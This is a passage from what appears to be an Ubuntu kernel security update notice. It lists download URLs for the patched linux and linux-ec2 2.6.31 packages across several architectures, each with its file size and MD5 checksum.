16c0355d3612806ef87addf7c9f8c9f9\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb\n      Size/MD5:  3790328 e35ab5c36ee1bac625d2a57bd19e0c5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb\n      Size/MD5: 64258256 70b947cc9e9012c9472f2c317f11ffae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb\n      Size/MD5:  9662096 ac58cebef695901ea01bc7413b79109f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb\n      Size/MD5:  3791668 3836f273873fedf9d2293ee0d11df6ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb\n      Size/MD5:  9531414 34d882276f33b0e37135c379a6e1c451\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb\n      Size/MD5: 62161518 9d3f3f79b9f14db8bd3dc68594eb8c8c\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb\n      Size/MD5:   603212 951db7e930eefc5fff9017c56badfb6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb\n      Size/MD5: 18660056 e39dda7f87b093e927c34a928b842c7a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   221398 682a7dab5b571a7b2fd31f19daf724c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    15536 55206db30b20aea4d7da38b342fc095d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    52128 1cde23d38ba6908e1123951ef4bc3c69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    44828 94402e34a45cf232ae86f3cc08bf7f4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    50072 65e128949b6f525d9028187fe1e7cc37\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    92518 338960088cec6b9b25ef2a96e96f3ebc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    37776 452d9c073d191ec2be1cad3aceb34490\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   537676 6bb8167794701151c613afe28a5c62c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   130666 ff5cf8923b89d0fa4b5c3c4a61ef93f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    53846 ffdc544c68e862a0a3038c99ac2d73a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   310118 c2092f9a83a4f59145005f2c451d304b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  4353666 3a04bb875ae70561075d05d5bb208977\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb\n      Size/MD5:   694766 85017cb531a49ea743cb7b30341b5ffa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb\n      Size/MD5:   694938 550a64d6d54ee5f34f1fb9eefbd4cc3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb\n      Size/MD5: 28924984 3001e6d36f6bf76621997bdbeb864234\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb\n      Size/MD5: 28885946 ff6296f4c684dd9facb011fc51b0b6f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb\n      Size/MD5: 11740736 287948976d92a7cae832a34ce33a99b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb\n      Size/MD5:   743052 35cb9d5d80b77a2586d08ffb65d3212a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   168272 fc4758b6b91802971538d3a3c519056d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   202768 73cfe4be43d350582d171ff0e178b6b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    27268 ae850a5e0ba4381a290b8f21ff88737f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   311688 3dab8c023e4aad0df74c5193aeaca49b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  2282064 f09b0e8828effab3770bfc1da159a8f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   158666 6765112bf6fed248c08465e47b4dab00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   203112 fed91a4bc3d356a5a9bb1c6110337413\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   161072 faec6563ccef41e925482b36619fca7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    38056 505cbeb1fdbf55eea7664a19dcedc11f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:     5762 a3ba57f83594477b27886cb3f4bd1b0d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    73750 53978367ed22b3daba246878064b72c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    22240 8a1036af3dacffb432813cc8422f6ae8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:     9548 f1e71c2129cc33f1ff139401b7b81547\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    39844 48e4aa79753fdb3ce1877ca1817b9fc6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    23484 f1be46cb2947ebe6b6d2e5b571d71a35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:  1389556 2ba51ea53e5454f75c8b39f21481e45d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    47382 89f1dff9282f3c667cf1b8c2bc41353c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    51636 41311bd8c8459ba04789539733e6ff5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:   128972 9697c034ed2bb74b5d18c5ae31fe1af0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb\n      Size/MD5:    15814 8f46e8ddd6cac16dbdbc7c89cc94bee0\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb\n      Size/MD5:   573528 fa913abed6caeb5c33eb2167f730956f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb\n      Size/MD5: 17943372 803487f6122441604ec3062e7bb98228\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   198832 3282a330510666a582f6b8c0269d2f53\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    32458 03e2d90ce28677b7956fa2a72726d02e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    49938 c0d1953d9212f1569f04e8c8ba0db7ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    42118 db5bcc80727cd1013bc8393df2a88e4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    45954 2d497ad958e7e7fc1b57ce51ff6b3570\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    87386 8e3ab58cf14ac0e97a334a65ae3e42ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    33754 bdbf52c3d681cca0ecdced183d2d37c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   534176 5f166aa72d31a95df7cdb60abe4a0fc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   128172 821c97524ce74e0685b135140c5261d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    49748 9423b0562b984b85856d219d7b67fa27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   295726 0736ef03d01a5e5e4fdf284ad2be5409\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  4185460 831a6068ef18d08ff697df14dead1668\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb\n      Size/MD5:   674832 6c28f2a428900b7c3ecd857dd2363150\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb\n      Size/MD5:   674164 daade678beff67e96da61f42286bb8d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb\n      Size/MD5:   674252 0786c96b6d902a71c6f1a2e5aa202345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb\n      Size/MD5: 28775482 99e9b99d437aa88ec42e838367ca0c3b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb\n      Size/MD5: 28938194 19d1d147a9e9dfb49fcd30b9d065d289\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb\n      Size/MD5: 28836780 00047de0d649be8b91c813fe7ee482b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb\n      Size/MD5: 11193984 1848c77671f6d9129f990e1a0a9940d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb\n      Size/MD5:   743050 af6030dae8f05d7ef583ee7d6f31be8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   172774 c11dd36baffeccf283ce48e122d7c791\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   186104 072e07c277b4f37611b21aad4390ccb0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    28372 82c8b14ef6982a48d3a8459d56ede43c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   292792 6c99c3b65ff7b159af94edf70358cb4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  2400232 94729dcb0c5adb15ded7b3302c4005eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   142004 9e43481b4e46409d8e711a628ce5e40a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   189566 83afe6de56cab613b4f890723a82a6b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   148522 b96767af921427e880579659ba7b757a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    35306 a6a1cbe7a75490632f24cad479916315\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:     6842 86b286685eabaf8b6d28d3f922249503\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    86058 c014cfa81ab99a01793d25b995c7d75f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    46424 d525bcf1a39f6a21f09d52d24e6a0eb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:     8916 f9efb7f192c3cc22c14df58803a64dfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    36282 1d843fa9ef5beed8582f2924d0b53bcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    21660 3ad0b4572c12885957a3b753fc3b9fe3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  1495010 630f37fe420a74a22b4ca2eba4960999\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    44088 fddf56b0285ec3d0e6fc61e0fe8b86e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    48484 2614a20d6d57892a8789091eeeaa67b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   117810 ff004889bca11286287a59c36fa24c0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    14526 4c9cb3d5598c843bf5b90ddf0292d3c1\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   198810 76156647956f29c9e519aeac038c63bb\n    http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    32452 9a5dd5fe15dda0be28f7afd966e89af9\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    49936 31c4008b50016b2a6c3a90703f2becbb\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    42148 931518b24b123d3749719c35b2b23759\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    45950 297c686f52a35049b3b2c87a96aebf68\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    87366 ec3f16cc0aeeef91b8c887ff347b6b0a\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    33750 a29ddd339c071c5b948c96e30f36f650\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   534366 b15b19f3e6c581d22514700dbd6502d8\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   128202 3d0f559a80187074bb210e3dae3bbfa0\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    49732 41abb7e30f0bdac62c5cd064c4b0ac3e\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   295732 12e912ce1f15d580960e7956de0c4ae0\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  4186814 7c18e86a3f5a5a985488ad67718887f9\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb\n      Size/MD5:   674880 5dd2779cd5be613c330b7dc35410f271\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb\n      Size/MD5: 28831528 8eaab1870eda62e8ee231e429c361455\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb\n      Size/MD5:   742994 99d2d0609d9032e2810e19c92fc92834\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   172836 8b15eb5579853f45dc49055351df4225\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   186092 0eb0ceb5c23748d829f3e1d7977a35be\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    28366 0301ac544cf27b3dce660787d7575804\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   292736 16e84844c99e73b4e00419c38d78db3d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  2400366 43dda8f1a10775e382e7a328381265db\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   141998 930123e6b57798468d7085ae9f549150\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   189564 8d6e18aedb4b970a3643207b96589863\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   148506 78efdbf1323c68be564ad06205842cb6\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    35300 054cf95e7af87d6f744b69eb8166f275\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:     6828 5dbf32d40e88f471614e5cf286670e8f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    86054 f24e7eaa3608985960e54a9048a24fb6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    46410 80945eba79f53965effd546d23a8560b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:     8906 e1c6021a615a4363dde2cf4a893fa53b\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    36270 eb2848e19ec2351b9102bc640e546991\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    21660 cfb271e26dfd127871f5d27547e0a7ba\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  1494736 44113d529e3f4d3828f8719facd86370\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    44068 98817942a8188bd9281def20a1d327bb\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    48474 ebc9e58b5f98182006d6e3bb9c5ce179\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   117786 9b864dfc32d19a8cf2d61a68894835e9\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    14524 9ad51e3871197eb84b193bd9a3b29ec2\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   321488 509ad8549565d0d87fe246df5b26c7af\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   263628 b7028cc16ec749cc2fdd86e985c7bc6a\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    58850 3e2f18df29a75debc326e5919c9c13da\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    67040 8fdde64943d01e5c6a372424d3d24a03\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    45914 6a21bb6fc6dce2767be6f974ffdab524\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    51296 4c928d4f04bf96f5cdc5ccf7d3a60c81\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    90684 eac2ea55da023924723593afffbb5d2c\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   105146 c407a156a5e56f284fa682d87d2ed50e\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    39492 38f377d5a0bdbbbb642545aa6d7f641c\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    39270 47f890e2a1418595d92858350aa16475\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   580998 825045ff82a442eaf1a21a5448b0cefb\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   626388 b56b5416b642ba57471e6e125b99a32f\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   149292 930001a305b0f78060f3472fe46cde00\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   147332 ef6994c30f19462a7fc0cb7cd8f4dacc\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    79750 75c6da2308e05334f89f62917aee5b3d\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    84136 caf2a7e924b03340e579e9bdc0a7ba50\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   402954 9fc3d4860f5c32aff3ac252379938fef\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   342516 5737df8ea2adfc45ecae9d322931187a\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  3813204 3ac91a51b3525bfbb0f6166fc140d7db\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  5193132 54dce7348221bcc93bbc01512d553a16\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5:   784762 523b94315bff20137df79c5308abd5b7\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5:   801042 2a8e55b23ad4dc09ee3cbb2fdc23cc28\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb\n      Size/MD5:   783708 185ba99656f4fa37874e0241e9f25dbb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5: 24820746 